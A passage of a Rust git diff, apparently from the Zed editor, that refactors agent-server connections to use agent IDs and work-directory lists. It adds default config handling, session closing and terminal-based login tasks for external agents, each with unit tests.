PlanEntryPriority::High, + }, + PlanItem { + step: "Implement the update_plan tool".to_string(), + status: PlanEntryStatus::InProgress, + priority: PlanEntryPriority::Medium, + }, + PlanItem { + step: "Add tests".to_string(), + status: PlanEntryStatus::Pending, + priority: PlanEntryPriority::Low, + }, + ], + } + } + + #[gpui::test] + async fn test_run_emits_plan_event(cx: &mut TestAppContext) { + let tool = Arc::new(UpdatePlanTool); + let (event_stream, mut 
event_rx) = ToolCallEventStream::test(); + + let input = sample_input(); + let result = cx + .update(|cx| tool.run(ToolInput::resolved(input.clone()), event_stream, cx)) + .await + .expect("tool should succeed"); + + assert_eq!(result, "Plan updated".to_string()); + + let plan = event_rx.expect_plan().await; + assert_eq!( + plan, + acp::Plan::new(vec![ + acp::PlanEntry::new( + "Inspect the existing tool wiring", + acp::PlanEntryPriority::High, + acp::PlanEntryStatus::Completed, + ), + acp::PlanEntry::new( + "Implement the update_plan tool", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::InProgress, + ), + acp::PlanEntry::new( + "Add tests", + acp::PlanEntryPriority::Low, + acp::PlanEntryStatus::Pending, + ), + ]) + ); + } + + #[gpui::test] + async fn test_replay_emits_plan_event(cx: &mut TestAppContext) { + let tool = UpdatePlanTool; + let (event_stream, mut event_rx) = ToolCallEventStream::test(); + + let input = sample_input(); + + cx.update(|cx| { + tool.replay(input.clone(), "Plan updated".to_string(), event_stream, cx) + .expect("replay should succeed"); + }); + + let plan = event_rx.expect_plan().await; + assert_eq!( + plan, + acp::Plan::new(vec![ + acp::PlanEntry::new( + "Inspect the existing tool wiring", + acp::PlanEntryPriority::High, + acp::PlanEntryStatus::Completed, + ), + acp::PlanEntry::new( + "Implement the update_plan tool", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::InProgress, + ), + acp::PlanEntry::new( + "Add tests", + acp::PlanEntryPriority::Low, + acp::PlanEntryStatus::Pending, + ), + ]) + ); + } + + #[gpui::test] + async fn test_run_defaults_priority_to_medium(cx: &mut TestAppContext) { + let tool = Arc::new(UpdatePlanTool); + let (event_stream, mut event_rx) = ToolCallEventStream::test(); + + let input = UpdatePlanToolInput { + plan: vec![ + PlanItem { + step: "First".to_string(), + status: PlanEntryStatus::InProgress, + priority: PlanEntryPriority::default(), + }, + PlanItem { + step: "Second".to_string(), + 
status: PlanEntryStatus::InProgress, + priority: PlanEntryPriority::default(), + }, + ], + }; + + let result = cx + .update(|cx| tool.run(ToolInput::resolved(input), event_stream, cx)) + .await + .expect("tool should succeed"); + + assert_eq!(result, "Plan updated".to_string()); + + let plan = event_rx.expect_plan().await; + assert_eq!( + plan, + acp::Plan::new(vec![ + acp::PlanEntry::new( + "First", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::InProgress, + ), + acp::PlanEntry::new( + "Second", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::InProgress, + ), + ]) + ); + } + + #[gpui::test] + async fn test_initial_title(cx: &mut TestAppContext) { + let tool = UpdatePlanTool; + + let title = cx.update(|cx| tool.initial_title(Ok(sample_input()), cx)); + assert_eq!(title, SharedString::from("Update plan")); + + let title = + cx.update(|cx| tool.initial_title(Ok(UpdatePlanToolInput { plan: Vec::new() }), cx)); + assert_eq!(title, SharedString::from("Clear plan")); + } +} diff --git a/crates/agent_servers/Cargo.toml b/crates/agent_servers/Cargo.toml index 4fb4109129ee5b8896f7a62afe49e0bcaef701ed..1542466be35bbce80983a73a3fc2e0998799160c 100644 --- a/crates/agent_servers/Cargo.toml +++ b/crates/agent_servers/Cargo.toml @@ -30,6 +30,7 @@ env_logger = { workspace = true, optional = true } fs.workspace = true futures.workspace = true gpui.workspace = true +feature_flags.workspace = true gpui_tokio = { workspace = true, optional = true } credentials_provider.workspace = true google_ai.workspace = true diff --git a/crates/agent_servers/src/acp.rs b/crates/agent_servers/src/acp.rs index ceceb5b8ae02a0674b27e0fa18244a94f2b409de..f7b6a59a63b02028a8b30c905c92b82805a52b33 100644 --- a/crates/agent_servers/src/acp.rs +++ b/crates/agent_servers/src/acp.rs @@ -7,20 +7,22 @@ use action_log::ActionLog; use agent_client_protocol::{self as acp, Agent as _, ErrorCode}; use anyhow::anyhow; use collections::HashMap; +use feature_flags::{AcpBetaFeatureFlag, 
FeatureFlagAppExt as _}; use futures::AsyncBufReadExt as _; use futures::io::BufReader; -use project::Project; -use project::agent_server_store::{AgentServerCommand, GEMINI_NAME}; +use project::agent_server_store::AgentServerCommand; +use project::{AgentId, Project}; use serde::Deserialize; use settings::Settings as _; -use task::ShellBuilder; +use task::{ShellBuilder, SpawnInTerminal}; use util::ResultExt as _; +use util::path_list::PathList; use util::process::Child; use std::path::PathBuf; use std::process::Stdio; +use std::rc::Rc; use std::{any::Any, cell::RefCell}; -use std::{path::Path, rc::Rc}; use thiserror::Error; use anyhow::{Context as _, Result}; @@ -30,17 +32,21 @@ use acp_thread::{AcpThread, AuthRequired, LoadError, TerminalProviderEvent}; use terminal::TerminalBuilder; use terminal::terminal_settings::{AlternateScroll, CursorShape, TerminalSettings}; +use crate::GEMINI_ID; + +pub const GEMINI_TERMINAL_AUTH_METHOD_ID: &str = "spawn-gemini-cli"; + #[derive(Debug, Error)] #[error("Unsupported version")] pub struct UnsupportedVersion; pub struct AcpConnection { - server_name: SharedString, - display_name: SharedString, + id: AgentId, telemetry_id: SharedString, connection: Rc, sessions: Rc>>, auth_methods: Vec, + command: AgentServerCommand, agent_capabilities: acp::AgentCapabilities, default_mode: Option, default_model: Option, @@ -124,13 +130,14 @@ impl AgentSessionList for AcpSessionList { .into_iter() .map(|s| AgentSessionInfo { session_id: s.session_id, - cwd: Some(s.cwd), + work_dirs: Some(PathList::new(&[s.cwd])), title: s.title.map(Into::into), updated_at: s.updated_at.and_then(|date_str| { chrono::DateTime::parse_from_rfc3339(&date_str) .ok() .map(|dt| dt.with_timezone(&chrono::Utc)) }), + created_at: None, meta: s.meta, }) .collect(), @@ -157,8 +164,8 @@ impl AgentSessionList for AcpSessionList { } pub async fn connect( - server_name: SharedString, - display_name: SharedString, + agent_id: AgentId, + project: Entity, command: 
AgentServerCommand, default_mode: Option, default_model: Option, @@ -166,8 +173,8 @@ pub async fn connect( cx: &mut AsyncApp, ) -> Result> { let conn = AcpConnection::stdio( - server_name, - display_name, + agent_id, + project, command.clone(), default_mode, default_model, @@ -182,8 +189,8 @@ const MINIMUM_SUPPORTED_VERSION: acp::ProtocolVersion = acp::ProtocolVersion::V1 impl AcpConnection { pub async fn stdio( - server_name: SharedString, - display_name: SharedString, + agent_id: AgentId, + project: Entity, command: AgentServerCommand, default_mode: Option, default_model: Option, @@ -195,6 +202,15 @@ impl AcpConnection { let mut child = builder.build_std_command(Some(command.path.display().to_string()), &command.args); child.envs(command.env.iter().flatten()); + if let Some(cwd) = project.update(cx, |project, cx| { + project + .default_path_list(cx) + .ordered_paths() + .next() + .cloned() + }) { + child.current_dir(cwd); + } let mut child = Child::spawn(child, Stdio::piped(), Stdio::piped(), Stdio::piped())?; let stdout = child.stdout.take().context("Failed to take stdout")?; @@ -269,7 +285,7 @@ impl AcpConnection { cx.update(|cx| { AcpConnectionRegistry::default_global(cx).update(cx, |registry, cx| { - registry.set_active_connection(server_name.clone(), &connection, cx) + registry.set_active_connection(agent_id.clone(), &connection, cx) }); }); @@ -278,10 +294,11 @@ impl AcpConnection { acp::InitializeRequest::new(acp::ProtocolVersion::V1) .client_capabilities( acp::ClientCapabilities::new() - .fs(acp::FileSystemCapability::new() + .fs(acp::FileSystemCapabilities::new() .read_text_file(true) .write_text_file(true)) .terminal(true) + .auth(acp::AuthCapabilities::new().terminal(true)) // Experimental: Allow for rendering terminal output from the agents .meta(acp::Meta::from_iter([ ("terminal_output".into(), true.into()), @@ -304,7 +321,7 @@ impl AcpConnection { // Use the one the agent provides if we have one .map(|info| info.name.into()) // Otherwise, just use 
the name - .unwrap_or_else(|| server_name.clone()); + .unwrap_or_else(|| agent_id.0.to_string().into()); let session_list = if response .agent_capabilities @@ -320,9 +337,9 @@ impl AcpConnection { }; // TODO: Remove this override once Google team releases their official auth methods - let auth_methods = if server_name == GEMINI_NAME { + let auth_methods = if agent_id.0.as_ref() == GEMINI_ID { let mut args = command.args.clone(); - args.retain(|a| a != "--experimental-acp"); + args.retain(|a| a != "--experimental-acp" && a != "--acp"); let value = serde_json::json!({ "label": "gemini /auth", "command": command.path.to_string_lossy().into_owned(), @@ -330,19 +347,19 @@ impl AcpConnection { "env": command.env.clone().unwrap_or_default(), }); let meta = acp::Meta::from_iter([("terminal-auth".to_string(), value)]); - vec![ - acp::AuthMethod::new("spawn-gemini-cli", "Login") + vec![acp::AuthMethod::Agent( + acp::AuthMethodAgent::new(GEMINI_TERMINAL_AUTH_METHOD_ID, "Login") .description("Login with your Google or Vertex AI account") .meta(meta), - ] + )] } else { response.auth_methods }; Ok(Self { + id: agent_id, auth_methods, + command, connection, - server_name, - display_name, telemetry_id, sessions, agent_capabilities: response.agent_capabilities, @@ -360,6 +377,102 @@ impl AcpConnection { pub fn prompt_capabilities(&self) -> &acp::PromptCapabilities { &self.agent_capabilities.prompt_capabilities } + + fn apply_default_config_options( + &self, + session_id: &acp::SessionId, + config_options: &Rc>>, + cx: &mut AsyncApp, + ) { + let id = self.id.clone(); + let defaults_to_apply: Vec<_> = { + let config_opts_ref = config_options.borrow(); + config_opts_ref + .iter() + .filter_map(|config_option| { + let default_value = self.default_config_options.get(&*config_option.id.0)?; + + let is_valid = match &config_option.kind { + acp::SessionConfigKind::Select(select) => match &select.options { + acp::SessionConfigSelectOptions::Ungrouped(options) => options + .iter() + 
.any(|opt| &*opt.value.0 == default_value.as_str()), + acp::SessionConfigSelectOptions::Grouped(groups) => { + groups.iter().any(|g| { + g.options + .iter() + .any(|opt| &*opt.value.0 == default_value.as_str()) + }) + } + _ => false, + }, + _ => false, + }; + + if is_valid { + let initial_value = match &config_option.kind { + acp::SessionConfigKind::Select(select) => { + Some(select.current_value.clone()) + } + _ => None, + }; + Some(( + config_option.id.clone(), + default_value.clone(), + initial_value, + )) + } else { + log::warn!( + "`{}` is not a valid value for config option `{}` in {}", + default_value, + config_option.id.0, + id + ); + None + } + }) + .collect() + }; + + for (config_id, default_value, initial_value) in defaults_to_apply { + cx.spawn({ + let default_value_id = acp::SessionConfigValueId::new(default_value.clone()); + let session_id = session_id.clone(); + let config_id_clone = config_id.clone(); + let config_opts = config_options.clone(); + let conn = self.connection.clone(); + async move |_| { + let result = conn + .set_session_config_option(acp::SetSessionConfigOptionRequest::new( + session_id, + config_id_clone.clone(), + default_value_id, + )) + .await + .log_err(); + + if result.is_none() { + if let Some(initial) = initial_value { + let mut opts = config_opts.borrow_mut(); + if let Some(opt) = opts.iter_mut().find(|o| o.id == config_id_clone) { + if let acp::SessionConfigKind::Select(select) = &mut opt.kind { + select.current_value = initial; + } + } + } + } + } + }) + .detach(); + + let mut opts = config_options.borrow_mut(); + if let Some(opt) = opts.iter_mut().find(|o| o.id == config_id) { + if let acp::SessionConfigKind::Select(select) = &mut opt.kind { + select.current_value = acp::SessionConfigValueId::new(default_value); + } + } + } + } } impl Drop for AcpConnection { @@ -368,7 +481,69 @@ impl Drop for AcpConnection { } } +fn terminal_auth_task_id(agent_id: &AgentId, method_id: &acp::AuthMethodId) -> String { + 
format!("external-agent-{}-{}-login", agent_id.0, method_id.0) +} + +fn terminal_auth_task( + command: &AgentServerCommand, + agent_id: &AgentId, + method: &acp::AuthMethodTerminal, +) -> SpawnInTerminal { + let mut args = command.args.clone(); + args.extend(method.args.clone()); + + let mut env = command.env.clone().unwrap_or_default(); + env.extend(method.env.clone()); + + acp_thread::build_terminal_auth_task( + terminal_auth_task_id(agent_id, &method.id), + method.name.clone(), + command.path.to_string_lossy().into_owned(), + args, + env, + ) +} + +/// Used to support the _meta method prior to stabilization +fn meta_terminal_auth_task( + agent_id: &AgentId, + method_id: &acp::AuthMethodId, + method: &acp::AuthMethod, +) -> Option { + #[derive(Deserialize)] + struct MetaTerminalAuth { + label: String, + command: String, + #[serde(default)] + args: Vec, + #[serde(default)] + env: HashMap, + } + + let meta = match method { + acp::AuthMethod::EnvVar(env_var) => env_var.meta.as_ref(), + acp::AuthMethod::Terminal(terminal) => terminal.meta.as_ref(), + acp::AuthMethod::Agent(agent) => agent.meta.as_ref(), + _ => None, + }?; + let terminal_auth = + serde_json::from_value::(meta.get("terminal-auth")?.clone()).ok()?; + + Some(acp_thread::build_terminal_auth_task( + terminal_auth_task_id(agent_id, method_id), + terminal_auth.label.clone(), + terminal_auth.command, + terminal_auth.args, + terminal_auth.env, + )) +} + impl AgentConnection for AcpConnection { + fn agent_id(&self) -> AgentId { + self.id.clone() + } + fn telemetry_id(&self) -> SharedString { self.telemetry_id.clone() } @@ -376,11 +551,14 @@ impl AgentConnection for AcpConnection { fn new_session( self: Rc, project: Entity, - cwd: &Path, + work_dirs: PathList, cx: &mut App, ) -> Task>> { - let name = self.server_name.clone(); - let cwd = cwd.to_path_buf(); + // TODO: remove this once ACP supports multiple working directories + let Some(cwd) = work_dirs.ordered_paths().next().cloned() else { + return 
Task::ready(Err(anyhow!("Working directory cannot be empty"))); + }; + let name = self.id.0.clone(); let mcp_servers = mcp_servers_for_project(&project, cx); cx.spawn(async move |cx| { @@ -470,97 +648,15 @@ impl AgentConnection for AcpConnection { } if let Some(config_opts) = config_options.as_ref() { - let defaults_to_apply: Vec<_> = { - let config_opts_ref = config_opts.borrow(); - config_opts_ref - .iter() - .filter_map(|config_option| { - let default_value = self.default_config_options.get(&*config_option.id.0)?; - - let is_valid = match &config_option.kind { - acp::SessionConfigKind::Select(select) => match &select.options { - acp::SessionConfigSelectOptions::Ungrouped(options) => { - options.iter().any(|opt| &*opt.value.0 == default_value.as_str()) - } - acp::SessionConfigSelectOptions::Grouped(groups) => groups - .iter() - .any(|g| g.options.iter().any(|opt| &*opt.value.0 == default_value.as_str())), - _ => false, - }, - _ => false, - }; - - if is_valid { - let initial_value = match &config_option.kind { - acp::SessionConfigKind::Select(select) => { - Some(select.current_value.clone()) - } - _ => None, - }; - Some((config_option.id.clone(), default_value.clone(), initial_value)) - } else { - log::warn!( - "`{}` is not a valid value for config option `{}` in {}", - default_value, - config_option.id.0, - name - ); - None - } - }) - .collect() - }; - - for (config_id, default_value, initial_value) in defaults_to_apply { - cx.spawn({ - let default_value_id = acp::SessionConfigValueId::new(default_value.clone()); - let session_id = response.session_id.clone(); - let config_id_clone = config_id.clone(); - let config_opts = config_opts.clone(); - let conn = self.connection.clone(); - async move |_| { - let result = conn - .set_session_config_option( - acp::SetSessionConfigOptionRequest::new( - session_id, - config_id_clone.clone(), - default_value_id, - ), - ) - .await - .log_err(); - - if result.is_none() { - if let Some(initial) = initial_value { - let mut opts = 
config_opts.borrow_mut(); - if let Some(opt) = opts.iter_mut().find(|o| o.id == config_id_clone) { - if let acp::SessionConfigKind::Select(select) = - &mut opt.kind - { - select.current_value = initial; - } - } - } - } - } - }) - .detach(); - - let mut opts = config_opts.borrow_mut(); - if let Some(opt) = opts.iter_mut().find(|o| o.id == config_id) { - if let acp::SessionConfigKind::Select(select) = &mut opt.kind { - select.current_value = acp::SessionConfigValueId::new(default_value); - } - } - } + self.apply_default_config_options(&response.session_id, config_opts, cx); } let action_log = cx.new(|_| ActionLog::new(project.clone())); let thread: Entity = cx.new(|cx| { AcpThread::new( None, - self.display_name.clone(), - Some(cwd), + None, + Some(work_dirs), self.clone(), project, action_log, @@ -601,7 +697,7 @@ impl AgentConnection for AcpConnection { self: Rc, session_id: acp::SessionId, project: Entity, - cwd: &Path, + work_dirs: PathList, title: Option, cx: &mut App, ) -> Task>> { @@ -610,16 +706,18 @@ impl AgentConnection for AcpConnection { "Loading sessions is not supported by this agent.".into() )))); } + // TODO: remove this once ACP supports multiple working directories + let Some(cwd) = work_dirs.ordered_paths().next().cloned() else { + return Task::ready(Err(anyhow!("Working directory cannot be empty"))); + }; - let cwd = cwd.to_path_buf(); let mcp_servers = mcp_servers_for_project(&project, cx); let action_log = cx.new(|_| ActionLog::new(project.clone())); - let title = title.unwrap_or_else(|| self.display_name.clone()); let thread: Entity = cx.new(|cx| { AcpThread::new( None, title, - Some(cwd.clone()), + Some(work_dirs.clone()), self.clone(), project, action_log, @@ -640,7 +738,7 @@ impl AgentConnection for AcpConnection { }, ); - cx.spawn(async move |_| { + cx.spawn(async move |cx| { let response = match self .connection .load_session( @@ -657,6 +755,11 @@ impl AgentConnection for AcpConnection { let (modes, models, config_options) = 
config_state(response.modes, response.models, response.config_options); + + if let Some(config_opts) = config_options.as_ref() { + self.apply_default_config_options(&session_id, config_opts, cx); + } + if let Some(session) = self.sessions.borrow_mut().get_mut(&session_id) { session.session_modes = modes; session.models = models; @@ -671,7 +774,7 @@ impl AgentConnection for AcpConnection { self: Rc, session_id: acp::SessionId, project: Entity, - cwd: &Path, + work_dirs: PathList, title: Option, cx: &mut App, ) -> Task>> { @@ -685,16 +788,18 @@ impl AgentConnection for AcpConnection { "Resuming sessions is not supported by this agent.".into() )))); } + // TODO: remove this once ACP supports multiple working directories + let Some(cwd) = work_dirs.ordered_paths().next().cloned() else { + return Task::ready(Err(anyhow!("Working directory cannot be empty"))); + }; - let cwd = cwd.to_path_buf(); let mcp_servers = mcp_servers_for_project(&project, cx); let action_log = cx.new(|_| ActionLog::new(project.clone())); - let title = title.unwrap_or_else(|| self.display_name.clone()); let thread: Entity = cx.new(|cx| { AcpThread::new( None, title, - Some(cwd.clone()), + Some(work_dirs), self.clone(), project, action_log, @@ -715,7 +820,7 @@ impl AgentConnection for AcpConnection { }, ); - cx.spawn(async move |_| { + cx.spawn(async move |cx| { let response = match self .connection .resume_session( @@ -733,6 +838,11 @@ impl AgentConnection for AcpConnection { let (modes, models, config_options) = config_state(response.modes, response.models, response.config_options); + + if let Some(config_opts) = config_options.as_ref() { + self.apply_default_config_options(&session_id, config_opts, cx); + } + if let Some(session) = self.sessions.borrow_mut().get_mut(&session_id) { session.session_modes = modes; session.models = models; @@ -743,10 +853,53 @@ impl AgentConnection for AcpConnection { }) } + fn supports_close_session(&self) -> bool { + 
self.agent_capabilities.session_capabilities.close.is_some() + } + + fn close_session( + self: Rc, + session_id: &acp::SessionId, + cx: &mut App, + ) -> Task> { + if !self.supports_close_session() { + return Task::ready(Err(anyhow!(LoadError::Other( + "Closing sessions is not supported by this agent.".into() + )))); + } + + let conn = self.connection.clone(); + let session_id = session_id.clone(); + cx.foreground_executor().spawn(async move { + conn.close_session(acp::CloseSessionRequest::new(session_id.clone())) + .await?; + self.sessions.borrow_mut().remove(&session_id); + Ok(()) + }) + } + fn auth_methods(&self) -> &[acp::AuthMethod] { &self.auth_methods } + fn terminal_auth_task( + &self, + method_id: &acp::AuthMethodId, + cx: &App, + ) -> Option { + let method = self + .auth_methods + .iter() + .find(|method| method.id() == method_id)?; + + match method { + acp::AuthMethod::Terminal(terminal) if cx.has_flag::() => { + Some(terminal_auth_task(&self.command, &self.id, terminal)) + } + _ => meta_terminal_auth_task(&self.id, method_id, method), + } + } + fn authenticate(&self, method_id: acp::AuthMethodId, cx: &mut App) -> Task> { let conn = self.connection.clone(); cx.foreground_executor().spawn(async move { @@ -913,6 +1066,149 @@ fn map_acp_error(err: acp::Error) -> anyhow::Error { } } +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn terminal_auth_task_reuses_command_and_merges_args_and_env() { + let command = AgentServerCommand { + path: "/path/to/agent".into(), + args: vec!["--acp".into(), "--verbose".into()], + env: Some(HashMap::from_iter([ + ("BASE".into(), "1".into()), + ("SHARED".into(), "base".into()), + ])), + }; + let method = acp::AuthMethodTerminal::new("login", "Login") + .args(vec!["/auth".into()]) + .env(std::collections::HashMap::from_iter([ + ("EXTRA".into(), "2".into()), + ("SHARED".into(), "override".into()), + ])); + + let terminal_auth_task = terminal_auth_task(&command, &AgentId::new("test-agent"), &method); + + assert_eq!( + 
terminal_auth_task.command.as_deref(), + Some("/path/to/agent") + ); + assert_eq!(terminal_auth_task.args, vec!["--acp", "--verbose", "/auth"]); + assert_eq!( + terminal_auth_task.env, + HashMap::from_iter([ + ("BASE".into(), "1".into()), + ("SHARED".into(), "override".into()), + ("EXTRA".into(), "2".into()), + ]) + ); + assert_eq!(terminal_auth_task.label, "Login"); + assert_eq!(terminal_auth_task.command_label, "Login"); + } + + #[test] + fn legacy_terminal_auth_task_parses_meta_and_retries_session() { + let method_id = acp::AuthMethodId::new("legacy-login"); + let method = acp::AuthMethod::Agent( + acp::AuthMethodAgent::new(method_id.clone(), "Login").meta(acp::Meta::from_iter([( + "terminal-auth".to_string(), + serde_json::json!({ + "label": "legacy /auth", + "command": "legacy-agent", + "args": ["auth", "--interactive"], + "env": { + "AUTH_MODE": "interactive", + }, + }), + )])), + ); + + let terminal_auth_task = + meta_terminal_auth_task(&AgentId::new("test-agent"), &method_id, &method) + .expect("expected legacy terminal auth task"); + + assert_eq!( + terminal_auth_task.id.0, + "external-agent-test-agent-legacy-login-login" + ); + assert_eq!(terminal_auth_task.command.as_deref(), Some("legacy-agent")); + assert_eq!(terminal_auth_task.args, vec!["auth", "--interactive"]); + assert_eq!( + terminal_auth_task.env, + HashMap::from_iter([("AUTH_MODE".into(), "interactive".into())]) + ); + assert_eq!(terminal_auth_task.label, "legacy /auth"); + } + + #[test] + fn legacy_terminal_auth_task_returns_none_for_invalid_meta() { + let method_id = acp::AuthMethodId::new("legacy-login"); + let method = acp::AuthMethod::Agent( + acp::AuthMethodAgent::new(method_id.clone(), "Login").meta(acp::Meta::from_iter([( + "terminal-auth".to_string(), + serde_json::json!({ + "label": "legacy /auth", + }), + )])), + ); + + assert!( + meta_terminal_auth_task(&AgentId::new("test-agent"), &method_id, &method).is_none() + ); + } + + #[test] + fn 
first_class_terminal_auth_takes_precedence_over_legacy_meta() { + let method_id = acp::AuthMethodId::new("login"); + let method = acp::AuthMethod::Terminal( + acp::AuthMethodTerminal::new(method_id, "Login") + .args(vec!["/auth".into()]) + .env(std::collections::HashMap::from_iter([( + "AUTH_MODE".into(), + "first-class".into(), + )])) + .meta(acp::Meta::from_iter([( + "terminal-auth".to_string(), + serde_json::json!({ + "label": "legacy /auth", + "command": "legacy-agent", + "args": ["legacy-auth"], + "env": { + "AUTH_MODE": "legacy", + }, + }), + )])), + ); + + let command = AgentServerCommand { + path: "/path/to/agent".into(), + args: vec!["--acp".into()], + env: Some(HashMap::from_iter([("BASE".into(), "1".into())])), + }; + + let terminal_auth_task = match &method { + acp::AuthMethod::Terminal(terminal) => { + terminal_auth_task(&command, &AgentId::new("test-agent"), terminal) + } + _ => unreachable!(), + }; + + assert_eq!( + terminal_auth_task.command.as_deref(), + Some("/path/to/agent") + ); + assert_eq!(terminal_auth_task.args, vec!["--acp", "/auth"]); + assert_eq!( + terminal_auth_task.env, + HashMap::from_iter([ + ("BASE".into(), "1".into()), + ("AUTH_MODE".into(), "first-class".into()), + ]) + ); + assert_eq!(terminal_auth_task.label, "Login"); + } +} + fn mcp_servers_for_project(project: &Entity, cx: &App) -> Vec { let context_server_store = project.read(cx).context_server_store().read(cx); let is_local = project.read(cx).is_local(); @@ -1167,7 +1463,7 @@ impl acp::Client for ClientDelegate { let outcome = task.await; - Ok(acp::RequestPermissionResponse::new(outcome)) + Ok(acp::RequestPermissionResponse::new(outcome.into())) } async fn write_text_file( @@ -1372,10 +1668,10 @@ impl acp::Client for ClientDelegate { Ok(acp::CreateTerminalResponse::new(terminal_id)) } - async fn kill_terminal_command( + async fn kill_terminal( &self, - args: acp::KillTerminalCommandRequest, - ) -> Result { + args: acp::KillTerminalRequest, + ) -> Result { 
self.session_thread(&args.session_id)? .update(&mut self.cx.clone(), |thread, cx| { thread.kill_terminal(args.terminal_id, cx) diff --git a/crates/agent_servers/src/agent_servers.rs b/crates/agent_servers/src/agent_servers.rs index a07226ca25095fdb7037114d32d5033364a4999f..2016e5aaaa27b62c956c5eee49c989172980de49 100644 --- a/crates/agent_servers/src/agent_servers.rs +++ b/crates/agent_servers/src/agent_servers.rs @@ -9,50 +9,40 @@ use collections::{HashMap, HashSet}; pub use custom::*; use fs::Fs; use http_client::read_no_proxy_from_env; -use project::agent_server_store::AgentServerStore; +use project::{AgentId, Project, agent_server_store::AgentServerStore}; use acp_thread::AgentConnection; use anyhow::Result; -use gpui::{App, AppContext, Entity, SharedString, Task}; -use project::Project; +use gpui::{App, AppContext, Entity, Task}; use settings::SettingsStore; use std::{any::Any, rc::Rc, sync::Arc}; -pub use acp::AcpConnection; +pub use acp::{AcpConnection, GEMINI_TERMINAL_AUTH_METHOD_ID}; pub struct AgentServerDelegate { store: Entity, - project: Entity, - status_tx: Option>, new_version_available: Option>>, } impl AgentServerDelegate { pub fn new( store: Entity, - project: Entity, - status_tx: Option>, new_version_tx: Option>>, ) -> Self { Self { store, - project, - status_tx, new_version_available: new_version_tx, } } - - pub fn project(&self) -> &Entity { - &self.project - } } pub trait AgentServer: Send { fn logo(&self) -> ui::IconName; - fn name(&self) -> SharedString; + fn agent_id(&self) -> AgentId; fn connect( &self, delegate: AgentServerDelegate, + project: Entity, cx: &mut App, ) -> Task>>; diff --git a/crates/agent_servers/src/custom.rs b/crates/agent_servers/src/custom.rs index 0a1830717217872868e66a8222902c49eeaabf9c..0dcd2240d6ecf6dc052cdd55953cff8ec1442eae 100644 --- a/crates/agent_servers/src/custom.rs +++ b/crates/agent_servers/src/custom.rs @@ -5,29 +5,34 @@ use anyhow::{Context as _, Result}; use collections::HashSet; use 
credentials_provider::CredentialsProvider; use fs::Fs; -use gpui::{App, AppContext as _, SharedString, Task}; +use gpui::{App, AppContext as _, Entity, Task}; use language_model::{ApiKey, EnvVar}; -use project::agent_server_store::{ - AllAgentServersSettings, CLAUDE_AGENT_NAME, CODEX_NAME, ExternalAgentServerName, GEMINI_NAME, +use project::{ + Project, + agent_server_store::{AgentId, AllAgentServersSettings}, }; use settings::{SettingsStore, update_settings_file}; use std::{rc::Rc, sync::Arc}; use ui::IconName; +pub const GEMINI_ID: &str = "gemini"; +pub const CLAUDE_AGENT_ID: &str = "claude-acp"; +pub const CODEX_ID: &str = "codex-acp"; + /// A generic agent server implementation for custom user-defined agents pub struct CustomAgentServer { - name: SharedString, + agent_id: AgentId, } impl CustomAgentServer { - pub fn new(name: SharedString) -> Self { - Self { name } + pub fn new(agent_id: AgentId) -> Self { + Self { agent_id } } } impl AgentServer for CustomAgentServer { - fn name(&self) -> SharedString { - self.name.clone() + fn agent_id(&self) -> AgentId { + self.agent_id.clone() } fn logo(&self) -> IconName { @@ -38,7 +43,7 @@ impl AgentServer for CustomAgentServer { let settings = cx.read_global(|settings: &SettingsStore, _| { settings .get::(None) - .get(self.name().as_ref()) + .get(self.agent_id().0.as_ref()) .cloned() }); @@ -55,7 +60,7 @@ impl AgentServer for CustomAgentServer { let settings = cx.read_global(|settings: &SettingsStore, _| { settings .get::(None) - .get(self.name().as_ref()) + .get(self.agent_id().0.as_ref()) .cloned() }); @@ -80,7 +85,7 @@ impl AgentServer for CustomAgentServer { fs: Arc, cx: &App, ) { - let name = self.name(); + let agent_id = self.agent_id(); let config_id = config_id.to_string(); let value_id = value_id.to_string(); @@ -88,8 +93,8 @@ impl AgentServer for CustomAgentServer { let settings = settings .agent_servers .get_or_insert_default() - .entry(name.to_string()) - .or_insert_with(|| default_settings_for_agent(&name, 
cx)); + .entry(agent_id.0.to_string()) + .or_insert_with(|| default_settings_for_agent(agent_id, cx)); match settings { settings::CustomAgentServerSettings::Custom { @@ -124,13 +129,13 @@ impl AgentServer for CustomAgentServer { } fn set_default_mode(&self, mode_id: Option, fs: Arc, cx: &mut App) { - let name = self.name(); + let agent_id = self.agent_id(); update_settings_file(fs, cx, move |settings, cx| { let settings = settings .agent_servers .get_or_insert_default() - .entry(name.to_string()) - .or_insert_with(|| default_settings_for_agent(&name, cx)); + .entry(agent_id.0.to_string()) + .or_insert_with(|| default_settings_for_agent(agent_id, cx)); match settings { settings::CustomAgentServerSettings::Custom { default_mode, .. } @@ -146,7 +151,7 @@ impl AgentServer for CustomAgentServer { let settings = cx.read_global(|settings: &SettingsStore, _| { settings .get::(None) - .get(self.name().as_ref()) + .get(self.agent_id().as_ref()) .cloned() }); @@ -156,13 +161,13 @@ impl AgentServer for CustomAgentServer { } fn set_default_model(&self, model_id: Option, fs: Arc, cx: &mut App) { - let name = self.name(); + let agent_id = self.agent_id(); update_settings_file(fs, cx, move |settings, cx| { let settings = settings .agent_servers .get_or_insert_default() - .entry(name.to_string()) - .or_insert_with(|| default_settings_for_agent(&name, cx)); + .entry(agent_id.0.to_string()) + .or_insert_with(|| default_settings_for_agent(agent_id, cx)); match settings { settings::CustomAgentServerSettings::Custom { default_model, .. 
} @@ -178,7 +183,7 @@ impl AgentServer for CustomAgentServer { let settings = cx.read_global(|settings: &SettingsStore, _| { settings .get::(None) - .get(self.name().as_ref()) + .get(self.agent_id().as_ref()) .cloned() }); @@ -200,13 +205,13 @@ impl AgentServer for CustomAgentServer { fs: Arc, cx: &App, ) { - let name = self.name(); + let agent_id = self.agent_id(); update_settings_file(fs, cx, move |settings, cx| { let settings = settings .agent_servers .get_or_insert_default() - .entry(name.to_string()) - .or_insert_with(|| default_settings_for_agent(&name, cx)); + .entry(agent_id.0.to_string()) + .or_insert_with(|| default_settings_for_agent(agent_id, cx)); let favorite_models = match settings { settings::CustomAgentServerSettings::Custom { @@ -235,7 +240,7 @@ impl AgentServer for CustomAgentServer { let settings = cx.read_global(|settings: &SettingsStore, _| { settings .get::(None) - .get(self.name().as_ref()) + .get(self.agent_id().as_ref()) .cloned() }); @@ -251,15 +256,15 @@ impl AgentServer for CustomAgentServer { fs: Arc, cx: &mut App, ) { - let name = 